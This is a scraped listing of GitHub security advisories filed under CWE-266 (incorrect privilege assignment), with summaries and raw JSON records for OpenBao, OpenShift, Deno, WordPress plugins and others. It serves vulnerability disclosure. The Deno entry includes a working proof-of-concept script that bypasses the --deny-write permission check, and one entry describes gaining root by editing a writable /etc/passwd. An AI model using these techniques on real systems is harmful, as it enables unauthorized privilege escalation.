Common Weakness Enumeration

CWE-266

Allowed

Incorrect Privilege Assignment

Abstraction: Base · Status: Draft

A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.

1913 vulnerabilities reference this CWE, most recent first.

GHSA-VF84-MXRQ-CRQC

Vulnerability from github – Published: 2025-08-08 14:32 – Updated: 2025-08-11 13:56
VLAI
Summary
OpenBao Root Namespace Operator May Elevate Token Privileges
Details

Impact

Accounts with access to the highly-privileged identity entity system in the root namespace may increase their scope directly to the root policy. While the identity system always allowed adding arbitrary policies, which in turn could contain capability grants on arbitrary paths, the root policy is restricted to manual generation using unseal or recovery key shares. The global root policy is not accessible from child namespaces.

Patches

OpenBao v2.3.2 will patch this issue.

Workarounds

Use of denied_parameters in any policy which has access to the affected identity endpoints (on identity entities) may be sufficient to prohibit this type of attack.

References

This issue was disclosed to HashiCorp and is the OpenBao equivalent of the following tickets:

  • https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032
  • https://nvd.nist.gov/vuln/detail/cve-2025-5999
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openbao/openbao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.1.0"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openbao/openbao"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20250806193240-9b0b5d4f345f"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-54996"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-269"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-08T14:32:42Z",
    "nvd_published_at": "2025-08-09T02:15:37Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n\nAccounts with access to the highly-privileged identity entity system in the root namespace may increase their scope directly to the `root` policy. While the identity system always allowed adding arbitrary policies, which in turn could contain capability grants on arbitrary paths, the `root` policy is restricted to manual generation using unseal or recovery key shares. The global `root` policy is not accessible from child namespaces.\n\n### Patches\n\nOpenBao v2.3.2 will patch this issue.\n\n### Workarounds\n\nUse of `denied_parameters` in any policy which has access to the affected identity endpoints (on [identity entities](https://openbao.org/api-docs/secret/identity/entity/)) may be sufficient to prohibit this type of attack. \n\n### References\n\nThis issue was disclosed to HashiCorp and is the OpenBao equivalent of the following tickets:\n\n- https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032\n- https://nvd.nist.gov/vuln/detail/cve-2025-5999",
  "id": "GHSA-vf84-mxrq-crqc",
  "modified": "2025-08-11T13:56:25Z",
  "published": "2025-08-08T14:32:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/security/advisories/GHSA-vf84-mxrq-crqc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54996"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/pull/1627"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/commit/9b0b5d4f345fdfb1065956f042b12cbd86cd6e0f"
    },
    {
      "type": "WEB",
      "url": "https://discuss.hashicorp.com/t/hcsec-2025-13-vault-root-namespace-operator-may-elevate-token-privileges/76032"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openbao/openbao"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openbao/openbao/releases/tag/v2.3.2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/cve-2025-5999"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenBao Root Namespace Operator May Elevate Token Privileges"
}

GHSA-VFJR-R7C6-MQ2H

Vulnerability from github – Published: 2022-05-24 17:08 – Updated: 2023-02-02 21:33
VLAI
Details

It has been found in openshift-enterprise version 3.11 and all openshift-enterprise versions from 4.1 to, including 4.3, that multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/mysql-apb.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-1708"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266",
      "CWE-269"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-02-07T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "It has been found in openshift-enterprise version 3.11 and all openshift-enterprise versions from 4.1 to, including 4.3, that multiple containers modify the permissions of /etc/passwd to make them modifiable by users other than root. An attacker with access to the running container can exploit this to modify /etc/passwd to add a user and escalate their privileges. This CVE is specific to the openshift/mysql-apb.",
  "id": "GHSA-vfjr-r7c6-mq2h",
  "modified": "2023-02-02T21:33:40Z",
  "published": "2022-05-24T17:08:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1708"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/articles/4859371"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0617"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0681"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0694"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2020:0800"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2020-1708"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793299"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1708"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VG2R-RMGP-CGQJ

Vulnerability from github – Published: 2025-10-07 22:36 – Updated: 2025-10-13 15:17
VLAI
Summary
Deno's --deny-write check does not prevent permission bypass
Details

Summary

Deno.FsFile.prototype.utime and Deno.FsFile.prototype.utimeSync are not limited by the permission model check --deny-write=./.

It's possible to change to change the access (atime) and modification (mtime) times on the file stream resource even when the file is opened with read only permission (and write: false) and file write operations are not allowed (the script is executed with --deny-write=./).

Similar APIs like Deno.utime and Deno.utimeSync require allow-write permission, however, when a file is opened, even with read only flags and deny-write permission, it's still possible to change the access (atime) and modification (mtime) times, and thus bypass the permission model.

PoC

Setup:

deno --version
deno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)
v8 13.7.152.14-rusty
typescript 5.8.3

touch test.txt
// touch test.txt
// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1
async function poc1(){
    using file = await Deno.open("./test.txt", { read: true, write: false});

    const fileInfoBefore = await file.stat();

    await file.utime(new Date("2000-01-01"), new Date("2000-01-01"));

    const fileInfoAfter = await file.stat();


    console.log(`BEFORE (utime)`)
    console.log(new Date(fileInfoBefore.mtime).getFullYear())
    console.log(new Date(fileInfoBefore.atime).getFullYear())


    console.log(`AFTER (utime)`)
    console.log(new Date(fileInfoAfter.mtime).getFullYear())
    console.log(new Date(fileInfoAfter.atime).getFullYear())
}


// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
function poc2(){
    using file = Deno.openSync("./test.txt", { read: true, write: false});

    const fileInfoBefore = file.statSync();

    file.utimeSync(new Date("2001-01-01"), new Date("2001-01-01"));

    const fileInfoAfter = file.statSync();


    console.log(`BEFORE (utimeSync)`)
    console.log(new Date(fileInfoBefore.mtime).getFullYear())
    console.log(new Date(fileInfoBefore.atime).getFullYear())


    console.log(`AFTER (utimeSync)`)
    console.log(new Date(fileInfoAfter.mtime).getFullYear())
    console.log(new Date(fileInfoAfter.atime).getFullYear())
}

// https://docs.deno.com/api/deno/~/Deno.utime
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
async function poc3(){
    // not executed
    await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}

// https://docs.deno.com/api/deno/~/Deno.utimeSync
// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
function poc4(){
    // not executed
    Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
}


async function main(){
    const poc = Deno.args[0] || 1;

    const status = await Deno.permissions.query({ name: "write", path: "./" });
    console.log(status);
    switch (poc) {
        case "1":
            poc1()
            break;
        case "2":
            poc2()
            break;
        case "3":
            poc3()
            break;
        case "4":
            poc4()
            break;
        default:
            poc1()
    }
}

main()

Output: - deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1

PermissionStatus { state: "denied", onchange: null }
BEFORE (utime)
2025
2025
AFTER (utime)
2000
2000
  • deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2
PermissionStatus { state: "denied", onchange: null }
BEFORE (utimeSync)
2000
2000
AFTER (utimeSync)
2001
2001
  • deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
    await Deno.utime("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
               ^
    ...
  • deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4
PermissionStatus { state: "denied", onchange: null }
error: Uncaught (in promise) NotCapable: Requires write access to "./test.txt", run again with the --allow-write flag
    Deno.utimeSync("./test.txt", new Date("2000-01-01"), new Date("2000-01-01"));
         ^
    ...

Impact

Permission model bypass

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "crates.io",
        "name": "deno"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.5.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61785"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-07T22:36:36Z",
    "nvd_published_at": "2025-10-08T01:15:32Z",
    "severity": "LOW"
  },
  "details": "### Summary\n\n`Deno.FsFile.prototype.utime` and `Deno.FsFile.prototype.utimeSync` are not limited by the permission model check `--deny-write=./`.\n\nIt\u0027s possible to change to change the access (`atime`) and modification (`mtime`) times on the file stream resource even when the file is opened with `read` only permission (and `write`: `false`) and file write operations are not allowed (the script is executed with `--deny-write=./`).\n\nSimilar APIs like `Deno.utime` and `Deno.utimeSync` require\u00a0`allow-write`\u00a0permission, however, when a file is opened, even with read only flags and deny-write permission, it\u0027s still possible to change the access (`atime`) and modification (`mtime`) times, and thus bypass the permission model.\n\n### PoC\n\nSetup:\n```\ndeno --version\ndeno 2.4.2 (stable, release, x86_64-unknown-linux-gnu)\nv8 13.7.152.14-rusty\ntypescript 5.8.3\n\ntouch test.txt\n```\n\n```js\n// touch test.txt\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1\nasync function poc1(){\n    using file = await Deno.open(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = await file.stat();\n    \n    await file.utime(new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n    \n    const fileInfoAfter = await file.stat();\n    \n    \n    console.log(`BEFORE (utime)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utime)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n\n// https://docs.deno.com/api/deno/~/Deno.FsFile.prototype.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2\nfunction poc2(){\n    using file = Deno.openSync(\"./test.txt\", { read: true, write: false});\n\n    const fileInfoBefore = file.statSync();\n    \n    file.utimeSync(new Date(\"2001-01-01\"), new Date(\"2001-01-01\"));\n    \n    const fileInfoAfter = file.statSync();\n    \n    \n    console.log(`BEFORE (utimeSync)`)\n    console.log(new Date(fileInfoBefore.mtime).getFullYear())\n    console.log(new Date(fileInfoBefore.atime).getFullYear())\n    \n    \n    console.log(`AFTER (utimeSync)`)\n    console.log(new Date(fileInfoAfter.mtime).getFullYear())\n    console.log(new Date(fileInfoAfter.atime).getFullYear())\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utime\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3\nasync function poc3(){\n    // not executed\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n// https://docs.deno.com/api/deno/~/Deno.utimeSync\n// deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4\nfunction poc4(){\n    // not executed\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n}\n\n\nasync function main(){\n    const poc = Deno.args[0] || 1;\n\n    const status = await Deno.permissions.query({ name: \"write\", path: \"./\" });\n    console.log(status);\n    switch (poc) {\n        case \"1\":\n            poc1()\n            break;\n        case \"2\":\n            poc2()\n            break;\n        case \"3\":\n            poc3()\n            break;\n        case \"4\":\n            poc4()\n            break;\n        default:\n            poc1()\n    }\n}\n\nmain()\n```\n\nOutput:\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 1`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utime)\n2025\n2025\nAFTER (utime)\n2000\n2000\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 2`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nBEFORE (utimeSync)\n2000\n2000\nAFTER (utimeSync)\n2001\n2001\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 3`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    await Deno.utime(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n               ^\n    ...\n```\n\n- `deno run --allow-read=./ --deny-write=./ poc_file.utime.ts 4`\n```\nPermissionStatus { state: \"denied\", onchange: null }\nerror: Uncaught (in promise) NotCapable: Requires write access to \"./test.txt\", run again with the --allow-write flag\n    Deno.utimeSync(\"./test.txt\", new Date(\"2000-01-01\"), new Date(\"2000-01-01\"));\n         ^\n    ...\n```\n\n\n### Impact\n\nPermission model bypass",
  "id": "GHSA-vg2r-rmgp-cgqj",
  "modified": "2025-10-13T15:17:42Z",
  "published": "2025-10-07T22:36:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/security/advisories/GHSA-vg2r-rmgp-cgqj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61785"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/pull/30872"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/commit/992e998dfe436cdc9325232759af8be92f11739b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/denoland/deno"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/releases/tag/v2.2.15"
    },
    {
      "type": "WEB",
      "url": "https://github.com/denoland/deno/releases/tag/v2.5.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Deno\u0027s --deny-write check does not prevent permission bypass"
}

GHSA-VGJ5-9P6R-986X

Vulnerability from github – Published: 2026-02-07 18:30 – Updated: 2026-02-07 18:30
VLAI
Details

A flaw has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. The affected element is the function addDept/updateDept/deleteDept of the file dataset\repos\warehouse\src\main\java\com\yeqifu\sys\controller\DeptController.java of the component Department Management. Executing a manipulation can lead to improper authorization. It is possible to launch the attack remotely. The exploit has been published and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2105"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-07T17:15:47Z",
    "severity": "MODERATE"
  },
  "details": "A flaw has been found in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. The affected element is the function addDept/updateDept/deleteDept of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\sys\\controller\\DeptController.java of the component Department Management. Executing a manipulation can lead to improper authorization. It is possible to launch the attack remotely. The exploit has been published and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The project was informed of the problem early through an issue report but has not responded yet.",
  "id": "GHSA-vgj5-9p6r-986x",
  "modified": "2026-02-07T18:30:27Z",
  "published": "2026-02-07T18:30:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2105"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yeqifu/warehouse/issues/57"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yeqifu/warehouse/issues/57#issue-3846662068"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yeqifu/warehouse"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.344681"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.344681"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.745515"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-VHVM-4XHH-VCGP

Vulnerability from github – Published: 2025-09-18 18:30 – Updated: 2025-09-18 18:30
VLAI
Details

A security flaw has been discovered in fuyang_lipengjun platform 1.0. This impacts the function AttributeController of the file /attribute/queryAll. Performing manipulation results in improper authorization. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-10675"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-18T16:15:49Z",
    "severity": "MODERATE"
  },
  "details": "A security flaw has been discovered in fuyang_lipengjun platform 1.0. This impacts the function AttributeController of the file /attribute/queryAll. Performing manipulation results in improper authorization. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited.",
  "id": "GHSA-vhvm-4xhh-vcgp",
  "modified": "2025-09-18T18:30:28Z",
  "published": "2025-09-18T18:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-10675"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.324796"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.324796"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.653343"
    },
    {
      "type": "WEB",
      "url": "https://www.cnblogs.com/aibot/p/19063430"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-VHVR-M6MX-8G3V

Vulnerability from github – Published: 2024-10-29 09:30 – Updated: 2026-04-01 18:32
VLAI
Details

: Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-50485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-29T09:15:12Z",
    "severity": "CRITICAL"
  },
  "details": ": Incorrect Privilege Assignment vulnerability in Udit Rawat Exam Matrix allows Privilege Escalation.This issue affects Exam Matrix: from n/a through 1.5.",
  "id": "GHSA-vhvr-m6mx-8g3v",
  "modified": "2026-04-01T18:32:12Z",
  "published": "2024-10-29T09:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50485"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/exam-matrix/vulnerability/wordpress-exam-matrix-plugin-1-5-privilege-escalation-vulnerability?_s_id=cve"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/vulnerability/exam-matrix/wordpress-exam-matrix-plugin-1-5-privilege-escalation-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJ36-GX8H-Q66M

Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-26 15:30
VLAI
Details

Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through <= 1.1.18.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-32530"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-25T17:17:06Z",
    "severity": "HIGH"
  },
  "details": "Incorrect Privilege Assignment vulnerability in WPFunnels Creator LMS creatorlms allows Privilege Escalation.This issue affects Creator LMS: from n/a through \u003c= 1.1.18.",
  "id": "GHSA-vj36-gx8h-q66m",
  "modified": "2026-03-26T15:30:34Z",
  "published": "2026-03-25T18:31:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32530"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/Wordpress/Plugin/creatorlms/vulnerability/wordpress-creator-lms-plugin-1-1-18-privilege-escalation-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJ73-H4QP-97X2

Vulnerability from github – Published: 2026-03-30 15:32 – Updated: 2026-03-30 15:32
VLAI
Details

A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-5122"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-30T15:16:35Z",
    "severity": "MODERATE"
  },
  "details": "A security flaw has been discovered in osrg GoBGP up to 4.3.0. This affects the function DecodeFromBytes of the file pkg/packet/bgp/bgp.go of the component BGP OPEN Message Handler. Performing a manipulation of the argument domainNameLen results in improper access controls. The attack may be initiated remotely. A high degree of complexity is needed for the attack. The exploitability is reported as difficult. The patch is named 2b09db390a3d455808363c53e409afe6b1b86d2d. It is suggested to install a patch to address this issue.",
  "id": "GHSA-vj73-h4qp-97x2",
  "modified": "2026-03-30T15:32:07Z",
  "published": "2026-03-30T15:32:07Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5122"
    },
    {
      "type": "WEB",
      "url": "https://github.com/osrg/gobgp/pull/3343"
    },
    {
      "type": "WEB",
      "url": "https://github.com/osrg/gobgp/commit/2b09db390a3d455808363c53e409afe6b1b86d2d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/osrg/gobgp"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/780124"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354154"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/354154/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-VJGX-4H24-68WP

Vulnerability from github – Published: 2024-07-24 21:31 – Updated: 2024-08-27 21:31
VLAI
Details

Insecure permissions in hwameistor v0.14.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account's token.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-36534"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-07-24T20:15:03Z",
    "severity": "HIGH"
  },
  "details": "Insecure permissions in hwameistor v0.14.3 allows attackers to access sensitive data and escalate privileges by obtaining the service account\u0027s token.",
  "id": "GHSA-vjgx-4h24-68wp",
  "modified": "2024-08-27T21:31:13Z",
  "published": "2024-07-24T21:31:30Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36534"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/HouqiyuA/0de688e6b874e480ddc1154350368450"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-VJM2-83QQ-QQMG

Vulnerability from github – Published: 2026-06-08 18:31 – Updated: 2026-06-08 18:31
VLAI
Details

A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-11532"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-266"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-08T17:16:40Z",
    "severity": "LOW"
  },
  "details": "A weakness has been identified in imvks786 student_management_system up to 9599b560ad3c3b83e75d328b76bedcd489ef1f46. Affected is an unknown function of the file /add.php of the component Student Record Handler. Executing a manipulation can lead to improper access controls. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet.",
  "id": "GHSA-vjm2-83qq-qqmg",
  "modified": "2026-06-08T18:31:50Z",
  "published": "2026-06-08T18:31:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11532"
    },
    {
      "type": "WEB",
      "url": "https://github.com/imvks786/student_management_system/issues/3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/imvks786/student_management_system"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/cve/CVE-2026-11532"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/submit/836634"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/369149"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/vuln/369149/cti"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
